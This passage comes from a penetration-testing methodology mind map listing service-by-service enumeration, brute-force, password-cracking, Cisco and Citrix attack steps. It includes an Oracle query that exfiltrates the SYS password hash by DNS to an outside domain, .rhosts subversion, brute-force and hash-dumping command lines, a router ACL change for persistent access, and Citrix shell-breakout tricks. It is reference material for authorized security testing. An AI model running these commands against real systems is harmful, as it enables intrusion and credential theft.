14.14.3.2.1. V3.sas.oc

14.14.3.3. Microsoft Active Directory server

14.14.3.3.1. msadClassesAttrs.ldif

14.14.3.4. Netscape Directory Server 4

14.14.3.4.1. nsslapd.sas_at.conf

14.14.3.4.2. nsslapd.sas_oc.conf

14.14.3.5. OpenLDAP directory server

14.14.3.5.1. slapd.sas_at.conf

14.14.3.5.2. slapd.sas_oc.conf

14.14.3.6. Sun ONE Directory Server 5.1

14.14.3.6.1. 75sas.ldif

14.15. PPTP/L2TP/VPN port 500/1723 open

14.15.1. Enumeration

14.15.1.1. ike-scan

14.15.1.2. ike-probe

14.15.2. Brute-Force

14.15.2.1. ike-crack

14.15.3. Reference Material

14.15.3.1. PSK cracking paper

14.15.3.2. SecurityFocus Infocus

14.15.3.3. Scanning a VPN Implementation

14.16. Modbus port 502 open

14.16.1. modscan

14.17. rlogin port 513 open

14.17.1. Rlogin Enumeration

14.17.1.1. Find the files

14.17.1.1.1. find / -name .rhosts

14.17.1.1.2. locate .rhosts

14.17.1.2. Examine Files

14.17.1.2.1. cat .rhosts

14.17.1.3. Manual Login

14.17.1.3.1. rlogin hostname -l username

14.17.1.3.2. rlogin <IP>

14.17.1.4. Subvert the files

14.17.1.4.1. echo ++ > .rhosts

14.17.2. Rlogin Brute force

14.17.2.1. Hydra

14.18. rsh port 514 open

14.18.1. Rsh Enumeration

14.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

14.18.2. Rsh Brute Force

14.18.2.1. rsh-grind

14.18.2.2. Hydra

14.18.2.3. medusa

14.19. SQL Server Port 1433 1434 open

14.19.1. SQL Enumeration

14.19.1.1. piggy

14.19.1.2. SQLPing

14.19.1.2.1. sqlping ip_address/hostname

14.19.1.3. SQLPing2

14.19.1.4. SQLPing3

14.19.1.5. SQLpoke

14.19.1.6. SQL Recon

14.19.1.7. SQLver

14.19.2. SQL Brute Force

14.19.2.1. SQLPAT

14.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack

14.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack

14.19.2.2. SQL Dict

14.19.2.3. SQLAT

14.19.2.4. Hydra

14.19.2.5. SQLlhf

14.19.2.6. ForceSQL

14.20. Citrix port 1494 open

14.20.1. Citrix Enumeration

14.20.1.1. Default Domain

14.20.1.2. Published Applications

14.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]

14.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]

14.20.2. Citrix Brute Force

14.20.2.1. bforce.js

14.20.2.2. connect.js

14.20.2.3. Citrix Brute-forcer

14.20.2.4. Reference Material

14.20.2.4.1. Hacking Citrix - the legitimate backdoor

14.20.2.4.2. Hacking Citrix - the forceful way

14.21. Oracle Port 1521 Open

14.21.1. Oracle Enumeration

14.21.1.1. oracsec

14.21.1.2. Repscan

14.21.1.3. Sidguess

14.21.1.4. Scuba

14.21.1.5. DNS/HTTP Enumeration

14.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL

14.21.1.5.2. Untitled

14.21.1.6. WinSID

14.21.1.7. Oracle default password list

14.21.1.8. TNSVer

14.21.1.8.1. tnsver host [port]

14.21.1.9. TCP Scan

14.21.1.10. Oracle TNSLSNR

14.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]

14.21.1.11. TNSCmd

14.21.1.11.1. perl tnscmd.pl -h ip_address

14.21.1.11.2. perl tnscmd.pl version -h ip_address

14.21.1.11.3. perl tnscmd.pl status -h ip_address

14.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)

14.21.1.12. LSNrCheck

14.21.1.13. Oracle Security Check (needs credentials)

14.21.1.14. OAT

14.21.1.14.1. sh opwg.sh -s ip_address

14.21.1.14.2. opwg.bat -s ip_address

14.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID

14.21.1.15. OScanner

14.21.1.15.1. sh oscanner.sh -s ip_address

14.21.1.15.2. oscanner.exe -s ip_address

14.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml

14.21.1.15.4. reportviewer.exe oscanner_saved_file.xml

14.21.1.16. NGS Squirrel for Oracle

14.21.1.17. Service Register

14.21.1.17.1. Service-register.exe ip_address

14.21.1.18. PLSQL Scanner 2008

14.21.2. Oracle Brute Force

14.21.2.1. OAK

14.21.2.1.1. ora-getsid hostname port sid_dictionary_list

14.21.2.1.2. ora-auth-alter-session host port sid username password sql

14.21.2.1.3. ora-brutesid host port start

14.21.2.1.4. ora-pwdbrute host port sid username password-file

14.21.2.1.5. ora-userenum host port sid userlistfile

14.21.2.1.6. ora-ver -e (-f -l -a) host port

14.21.2.2. breakable (Targets Application Server Port)

14.21.2.2.1. breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose

14.21.2.3. SQLInjector (Targets Application Server Port)

14.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL

14.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle

14.21.2.4. Check Password

14.21.2.5. orabf

14.21.2.5.1. orabf [hash]:[username] [options]

14.21.2.6. thc-orakel

14.21.2.6.1. Cracker

14.21.2.6.2. Client

14.21.2.6.3. Crypto

14.21.2.7. DBVisualisor

14.21.2.7.1. Sql scripts from pentest.co.uk

14.21.2.7.2. Manual sql input of previously reported vulnerabilties

14.21.3. Oracle Reference Material

14.21.3.1. Understanding SQL Injection

14.21.3.2. SQL Injection walkthrough

14.21.3.3. SQL Injection by example

14.21.3.4. Advanced SQL Injection in Oracle databases

14.21.3.5. Blind SQL Injection

14.21.3.6. SQL Cheatsheets

14.21.3.6.1. Untitled

14.22. NFS Port 2049 open

14.22.1. NFS Enumeration

14.22.1.1. showmount -e hostname/ip_address

14.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point

14.22.2. NFS Brute Force

14.22.2.1. Interact with NFS share and try to add/delete

14.22.2.2. Exploit and Confuse Unix

14.22.3. Examine Configuration Files

14.22.3.1. /etc/exports

14.22.3.2. /etc/lib/nfs/xtab

14.22.4. nmap nse script

14.22.4.1. nfs-showmount

14.23. Compaq/HP Insight Manager Port 2301,2381open

14.23.1. HP Enumeration

14.23.1.1. Authentication Method

14.23.1.1.1. Host OS Authentication

14.23.1.1.2. Default Authentication

14.23.1.2. Wikto

14.23.1.3. Nstealth

14.23.2. HP Bruteforce

14.23.2.1. Hydra

14.23.2.2. Acunetix

14.23.3. Examine Configuration Files

14.23.3.1. path.properties

14.23.3.2. mx.log

14.23.3.3. CLIClientConfig.cfg

14.23.3.4. database.props

14.23.3.5. pg_hba.conf

14.23.3.6. jboss-service.xml

14.23.3.7. .namazurc

14.24. MySQL port 3306 open

14.24.1. Enumeration

14.24.1.1. nmap -A -n -p3306 <IP Address>

14.24.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>

14.24.1.3. telnet IP_Address 3306

14.24.1.4. use test; select * from test;

14.24.1.5. To check for other DB's -- show databases

14.24.2. Administration

14.24.2.1. MySQL Network Scanner

14.24.2.2. MySQL GUI Tools

14.24.2.3. mysqlshow

14.24.2.4. mysqlbinlog

14.24.3. Manual Checks

14.24.3.1. Default usernames and passwords

14.24.3.1.1. username: root password:

14.24.3.1.2. testing

14.24.3.2. Configuration Files

14.24.3.2.1. Operating System

14.24.3.2.2. Command History

14.24.3.2.3. Log Files

14.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql

14.24.3.2.5. MySQL data directory (Location specified in my.cnf)

14.24.3.2.6. SSL Check

14.24.3.3. Privilege Escalation

14.24.3.3.1. Current Level of access

14.24.3.3.2. Access passwords

14.24.3.3.3. Create a new user and grant him privileges

14.24.3.3.4. Break into a shell

14.24.4. SQL injection

14.24.4.1. mysql-miner.pl

14.24.4.1.1. mysql-miner.pl http://target/ expected_string database

14.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html

14.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

14.24.5. References.

14.24.5.1. Design Weaknesses

14.24.5.1.1. MySQL running as root

14.24.5.1.2. Exposed publicly on Internet

14.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql

14.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0

14.25. RDesktop port 3389 open

14.25.1. Rdesktop Enumeration

14.25.1.1. Remote Desktop Connection

14.25.2. Rdestop Bruteforce

14.25.2.1. TSGrinder

14.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address

14.25.2.2. Tscrack

14.26. Sybase Port 5000+ open

14.26.1. Sybase Enumeration

14.26.1.1. sybase-version ip_address from NGS

14.26.2. Sybase Vulnerability Assessment

14.26.2.1. Use DBVisualiser

14.26.2.1.1. Sybase Security checksheet

14.26.2.1.2. Manual sql input of previously reported vulnerabilties

14.26.2.2. NGS Squirrel for Sybase

14.27. SIP Port 5060 open

14.27.1. SIP Enumeration

14.27.1.1. netcat

14.27.1.1.1. nc IP_Address Port

14.27.1.2. sipflanker

14.27.1.2.1. python sipflanker.py 192.168.1-254

14.27.1.3. Sipscan

14.27.1.4. smap

14.27.1.4.1. smap IP_Address/Subnet_Mask

14.27.1.4.2. smap -o IP_Address/Subnet_Mask

14.27.1.4.3. smap -l IP_Address

14.27.2. SIP Packet Crafting etc.

14.27.2.1. sipsak

14.27.2.1.1. Tracing paths: - sipsak -T -s sip:usernaem@domain

14.27.2.1.2. Options request:- sipsak -vv -s sip:username@domain

14.27.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain

14.27.2.2. siprogue

14.27.3. SIP Vulnerability Scanning/ Brute Force

14.27.3.1. tftp bruteforcer

14.27.3.1.1. Default dictionary file

14.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes

14.27.3.2. VoIPaudit

14.27.3.3. SiVuS

14.27.4. Examine Configuration Files

14.27.4.1. SIPDefault.cnf

14.27.4.2. asterisk.conf

14.27.4.3. sip.conf

14.27.4.4. phone.conf

14.27.4.5. sip_notify.conf

14.27.4.6. <Ethernet address>.cfg

14.27.4.7. 000000000000.cfg

14.27.4.8. phone1.cfg

14.27.4.9. sip.cfg etc. etc.

14.28. VNC port 5900^ open

14.28.1. VNC Enumeration

14.28.1.1. Scans

14.28.1.1.1. 5900^ for direct access.5800 for HTTP access.

14.28.2. VNC Brute Force

14.28.2.1. Password Attacks

14.28.2.1.1. Remote

14.28.2.1.2. Local

14.28.3. Exmine Configuration Files

14.28.3.1. .vnc

14.28.3.2. /etc/vnc/config

14.28.3.3. $HOME/.vnc/config

14.28.3.4. /etc/sysconfig/vncservers

14.28.3.5. /etc/vnc.conf

14.29. Tor Port 9001, 9030 open

14.29.1. Tor Node Checker

14.29.1.1. Ip Pages

14.29.1.2. Kewlio.net

14.29.2. nmap NSE script

14.30. Jet Direct 9100 open

14.30.1. hijetta

15. Password cracking

15.1. Rainbow crack

15.1.1. ophcrack

15.1.2. rainbow tables

15.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt

15.2. Ophcrack

15.3. Cain & Abel

15.4. John the Ripper

15.4.1. ./unshadow passwd shadow > file_to_crack

15.4.2. ./john -single file_to_crack

15.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

15.4.4. ./john -show file_to_crack

15.4.5. ./john --incremental:All file_to_crack

15.5. fgdump

15.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

15.6. pwdump6

15.7. medusa

15.8. LCP

15.9. L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada

15.9.1. Domain credentials

15.9.2. Sniffing

15.9.3. pwdump import

15.9.4. sam import

15.10. aiocracker

15.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list

16. Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.

16.1. Manual

16.1.1. Patch Levels

16.1.2. Confirmed Vulnerabilities

16.1.2.1. Severe

16.1.2.2. High

16.1.2.3. Medium

16.1.2.4. Low

16.2. Automated

16.2.1. Reports

16.2.2. Vulnerabilities

16.2.2.1. Severe

16.2.2.2. High

16.2.2.3. Medium

16.2.2.4. Low

16.3. Tools

16.3.1. GFI

16.3.2. Nessus (Linux)

16.3.2.1. Nessus (Windows)

16.3.3. NGS Typhon

16.3.4. NGS Squirrel for Oracle

16.3.5. NGS Squirrel for SQL

16.3.6. SARA

16.3.7. MatriXay

16.3.8. BiDiBlah

16.3.9. SSA

16.3.10. Oval Interpreter

16.3.11. Xscan

16.3.12. Security Manager +

16.3.13. Inguma

16.4. Resources

16.4.1. Security Focus

16.4.2. Microsoft Security Bulletin

16.4.3. Common Vulnerabilities and Exploits (CVE)

16.4.4. National Vulnerability Database (NVD)

16.4.5. The Open Source Vulnerability Database (OSVDB)

16.4.5.1. Standalone Database

16.4.5.1.1. Update URL

16.4.6. United States Computer Emergency Response Team (US-CERT)

16.4.7. Computer Emergency Response Team

16.4.8. Mozilla Security Information

16.4.9. SANS

16.4.10. Securiteam

16.4.11. PacketStorm Security

16.4.12. Security Tracker

16.4.13. Secunia

16.4.14. Vulnerabilities.org

16.4.15. ntbugtraq

16.4.16. Wireless Vulnerabilities and Exploits (WVE)

16.5. Blogs

16.5.1. Carnal0wnage

16.5.2. Fsecure Blog

16.5.3. g0ne blog

16.5.4. GNUCitizen

16.5.5. ha.ckers Blog

16.5.6. Jeremiah Grossman Blog

16.5.7. Metasploit

16.5.8. nCircle Blogs

16.5.9. pentest mokney.net

16.5.10. Rational Security

16.5.11. Rational Security

16.5.12. Rise Security

16.5.13. Security Fix Blog

16.5.14. Software Vulnerability Exploitation Blog

16.5.15. Software Vulnerability Exploitation Blog

16.5.16. Taosecurity Blog

17. AS/400 Auditing

17.1. Remote

17.1.1. Information Gathering

17.1.1.1. Nmap using common iSeries (AS/400) services.

17.1.1.1.1. Unsecured services (Port;name;description)

17.1.1.1.2. Secured services (Port;name;description)

17.1.1.2. NetCat (old school technique)

17.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"

17.1.1.3. Banners Grabbing

17.1.1.3.1. Telnet

17.1.1.3.2. FTP

17.1.1.3.3. HTTP Banner

17.1.1.3.4. POP3

17.1.1.3.5. SNMP

17.1.1.3.6. SMTP

17.1.2. Users Enumeration

17.1.2.1. Default AS/400 users accounts

17.1.2.2. Error messages

17.1.2.2.1. Telnet Login errors

17.1.2.2.2. POP3 authentication Errors

17.1.2.3. Qsys symbolic link (if ftp is enabled)

17.1.2.3.1. ftp target | quote stat | quote site namefmt 1

17.1.2.3.2. cd /

17.1.2.3.3. quote site listfmt 1

17.1.2.3.4. mkdir temp

17.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')

17.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')

17.1.2.3.7. dir /temp/qsys/*.usrprf

17.1.2.4. LDAP

17.1.2.4.1. Need os400-sys value from ibm-slapdSuffix

17.1.2.4.2. Tool to browse LDAP

17.1.3. Exploitation

17.1.3.1. CVE References

17.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400

17.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0

17.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3

17.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3

17.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0

17.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0

17.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3

17.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0

17.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3

17.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3

17.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3

17.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0

17.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3

17.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3

17.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3

17.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3

17.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3

17.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3

17.1.3.2. Access with Work Station Gateway

17.1.3.2.1. http://target:5061/WSG

17.1.3.2.2. Default AS/400 accounts.

17.1.3.3. Network attacks (next release)

17.1.3.3.1. DB2

17.1.3.3.2. QSHELL

17.1.3.3.3. Hijacking Terminals

17.1.3.3.4. Trojan attacks

17.1.3.3.5. Hacking from AS/400

17.2. Local

17.2.1. System Value Security

17.2.1.1. Untitled

17.2.1.1.1. Untitled

17.2.1.2. Untitled

17.2.1.2.1. Untitled

17.2.1.3. Untitled

17.2.1.3.1. Untitled

17.2.1.4. Untitled

17.2.1.4.1. Recommended value is 30

17.2.2. Password Policy

17.2.2.1. Untitled

17.2.2.1.1. Untitled

17.2.2.1.2. Untitled

17.2.2.2. Untitled

17.2.2.2.1. Untitled

17.2.2.3. Untitled

17.2.2.3.1. Untitled

17.2.2.4. Untitled

17.2.2.4.1. Untitled

17.2.2.5. Untitled

17.2.3. Audit level

17.2.3.1. Untitled

17.2.3.1.1. Recommended value is *SECURITY

17.2.4. Documentation

17.2.4.1. Users class

17.2.4.1.1. Untitled

17.2.4.2. System Audit Settings

17.2.4.2.1. Untitled

17.2.4.3. Special Authorities Definitions

17.2.4.3.1. Untitled

18. Bluetooth Specific Testing

18.1. Bluescanner

18.2. Bluesweep

18.3. btscanner

18.4. Redfang

18.5. Blueprint

18.6. Bluesnarfer

18.7. Bluebugger

18.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

18.8. Blueserial

18.9. Bloover

18.10. Bluesniff

18.11. Exploit Frameworks

18.11.1. BlueMaho

18.11.1.1. Untitled

18.12. Resources

18.12.1. URL's

18.12.1.1. BlueStumbler.org

18.12.1.2. Bluejackq.com

18.12.1.3. Bluejacking.com

18.12.1.4. Bluejackers

18.12.1.5. bluetooth-pentest

18.12.1.6. ibluejackedyou.com

18.12.1.7. Trifinite

18.12.2. Vulnerability Information

18.12.2.1. Common Vulnerabilities and Exploits (CVE)

18.12.2.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth

18.12.3. White Papers

18.12.3.1. Bluesnarfing

19. Cisco Specific Testing

19.1. Methodology

19.1.1. Scan & Fingerprint.

19.1.1.1. Untitled

19.1.1.2. Untitled

19.1.1.3. If SNMP is active, then community string guessing should be performed.

19.1.2. Credentials Guessing.

19.1.2.1. Untitled

19.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

19.1.3. Connect

19.1.3.1. Untitled

19.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

19.1.4. Check for bugs

19.1.4.1. Untitled

19.1.4.1.1. The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact. 

19.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

19.1.5. Further your attack

19.1.5.1. Untitled

19.1.5.1.1. running-config is the currently running configuration settings.  This gets loaded from the startup-config on boot.  This configuration file is editable and the changes are immediate.  Any changes will be lost once the router is rebooted.  It is this file that requires altering to maintain a non-permenant connection through to the internal network.  

19.1.5.1.2. startup-config is the boot up configuration file.  It is this file that needs altering to maintain a permenant  connection through to the internal network.  

19.1.5.2. Untitled

19.1.5.2.1. #> access-list 100 permit ip <IP> any

19.2. Scan & Fingerprint.

19.2.1. Port Scanning

19.2.1.1. nmap

19.2.1.1.1. Untitled

19.2.1.2. Other tools

19.2.1.2.1. Untitled

19.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

19.2.2. Fingerprinting

19.2.2.1. Untitled

19.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175

19.2.2.2. Untitled

19.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

19.2.2.2.2. Untitled

19.3. Password Guessing.

19.3.1. Untitled

19.3.1.1. ./CAT  -h  <IP>  -a  password.wordlist

19.3.1.2. Untitled

19.3.2. Untitled

19.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]

19.3.2.2. Untitled

19.3.3. Untitled

19.3.3.1. BT tmp # hydra  -l  ""  -P  password.wordlist  -t  4  <IP>  cisco

19.3.3.2. Untitled

19.4. SNMP Attacks.

19.4.1. Untitled

19.4.1.1. ./CAT  -h  <IP>  -w  SNMP.wordlist

19.4.1.2. Untitled

19.4.2. Untitled

19.4.2.1. onesixytone  -c  SNMP.wordlist  <IP>

19.4.2.2. BT onesixtyone-0.3.2 # onesixtyone  -c  dict.txt  10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug

19.4.3. Untitled

19.4.3.1. snmapwalk  -v  <Version>  -c  <Community string>  <IP>

19.4.3.2. Untitled

19.5. Connecting.

19.5.1. Telnet

19.5.1.1. Untitled

19.5.1.1.1.  telnet  <IP>

19.5.1.1.2. Sample Banners

19.5.2. SSH

19.5.3. Web Browser

19.5.3.1. Untitled

19.5.3.1.1. This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:

19.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:

19.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

19.5.4. TFTP

19.5.4.1. Untitled

19.5.4.1.1. Untitled

19.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names.

19.5.4.2. Untitled

19.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>

19.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>

19.5.4.2.3. Creating backdoors in Cisco IOS using TCL

19.6. Known Bugs.

19.6.1. Attack Tools

19.6.1.1. Untitled

19.6.1.1.1. Untitled

19.6.1.2. Untitled

19.6.1.2.1. Web browse to the Cisco device: http://<IP>

19.6.1.2.2. Untitled

19.6.1.2.3. Untitled

19.6.1.2.4. Untitled

19.6.1.3. Untitled

19.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt

19.6.2. Common Vulnerabilities and Exploits (CVE) Information

19.6.2.1. Vulnerabilties and exploit information relating to these products can be found here:http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS

19.7. Configuration Files.

19.7.1. Untitled

19.7.1.1. Configuration files explained

19.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access.

19.7.1.1.2. Untitled

19.7.1.1.3. Untitled

19.7.1.1.4. Password Encryption Utilised

19.7.1.1.5. Untitled

19.7.1.2. Configuration Testing Tools

19.7.1.2.1. Nipper

19.7.1.2.2. fwauto (Beta)

19.8. References.

19.8.1. Cisco IOS Exploitation Techniques

20. Citrix Specific Testing

20.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix

20.2. Enumeration

20.2.1. web search

20.2.1.1. Google (GHDB)

20.2.1.1.1. ext:ica

20.2.1.1.2. inurl:citrix/metaframexp/default/login.asp

20.2.1.1.3. [WFClient] Password= filetype:ica

20.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On

20.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"

20.2.1.1.6. inurl:/Citrix/Nfuse17/

20.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx

20.2.1.2. Google Hacks (Author Discovered)

20.2.1.2.1. filetype:ica Username=

20.2.1.2.2. inurl:Citrix/AccessPlatform/auth/login.aspx

20.2.1.2.3. inurl:/Citrix/AccessPlatform/

20.2.1.2.4. inurl:LogonAgent/Login.asp

20.2.1.2.5. inurl:/CITRIX/NFUSE/default/login.asp

20.2.1.2.6. inurl:/Citrix/NFuse161/login.asp

20.2.1.2.7. inurl:/Citrix/NFuse16

20.2.1.2.8. inurl:/Citrix/NFuse151/

20.2.1.2.9. allintitle:MetaFrame XP Login

20.2.1.2.10. allintitle:MetaFrame Presentation Server Login

20.2.1.2.11. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On

20.2.1.2.12. allintitle:Citrix(R) NFuse(TM) Classic Login

20.2.1.3. Yahoo

20.2.1.3.1. originurlextension:ica

20.2.2. site search

20.2.2.1. Manual

20.2.2.1.1. review web page for useful information

20.2.2.1.2. review source for web page

20.2.3. generic

20.2.3.1. nmap -A -PN -p 80,443,1494 ip_address

20.2.3.2. amap -bqv ip_address port_no.

20.2.4. citrix specific

20.2.4.1. enum.pl

20.2.4.1.1. perl enum.pl ip_address

20.2.4.2. enum.js

20.2.4.2.1. enum.js apps TCPBrowserAdress=ip_address

20.2.4.3. connect.js

20.2.4.3.1. connect.js TCPBrowserAdress=ip_address Application=advertised-application

20.2.4.4. Citrix-pa-scan

20.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri

20.2.4.5. pabrute.c

20.2.4.5.1. ./pabrute pubapp list app_list ip_address

20.2.5. Default Ports

20.2.5.1. TCP

20.2.5.1.1. Citrix XML Service

20.2.5.1.2. Advanced Management Console

20.2.5.1.3. Citrix SSL Relay

20.2.5.1.4. ICA sessions

20.2.5.1.5. Server to server

20.2.5.1.6. Management Console to server

20.2.5.1.7. Session Reliability (Auto-reconnect)

20.2.5.1.8. License Management Console

20.2.5.1.9. License server

20.2.5.2. UDP

20.2.5.2.1. Clients to ICA browser service

20.2.5.2.2. Server-to-server

20.2.6. nmap nse scripts

20.2.6.1. citrix-enum-apps

20.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>

20.2.6.2. citrix-enum-apps-xml

20.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>

20.2.6.3. citrix-enum-servers

20.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604

20.2.6.4. citrix-enum-servers-xml

20.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>

20.2.6.5. citrix-brute-xml

20.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

20.3. Scanning

20.3.1. Nessus

20.3.1.1. Plugins

20.3.1.1.1. CGI abuses

20.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)

20.3.1.1.3. Misc.

20.3.1.1.4. Service Detection

20.3.1.1.5. Web Servers

20.3.1.1.6. Windows

20.3.2. Nikto

20.3.2.1. perl nikto.pl -host ip_address -port port_no.

20.3.2.1.1. Untitled

20.4. Exploitation

20.4.1. Alter default .ica files

20.4.1.1. InitialProgram=cmd.exe

20.4.1.2. InitialProgram=explorer.exe

20.4.2. Enumerate and Connect

20.4.2.1. For applications identified by Citrix-pa-scan

20.4.2.1.1. Pas

20.4.2.2. For published applications with a Citrix client when the master browser is non-public.

20.4.2.2.1. Citrix-pa-proxy

20.4.3. Manual Testing

20.4.3.1. Create Batch File (cmd.bat)

20.4.3.1.1. 1

20.4.3.1.2. 2

20.4.3.2. Host Scripting File (cmd.vbs)

20.4.3.2.1. Option Explicit

20.4.3.2.2. Dim objShell

20.4.3.2.3. objShell.Run "%comspec% /k"

20.4.3.2.4. WScript.Quit

20.4.3.2.5. alternative functionality

20.4.3.3. iKat

20.4.3.3.1. Integrated Kiosk Attack Tool

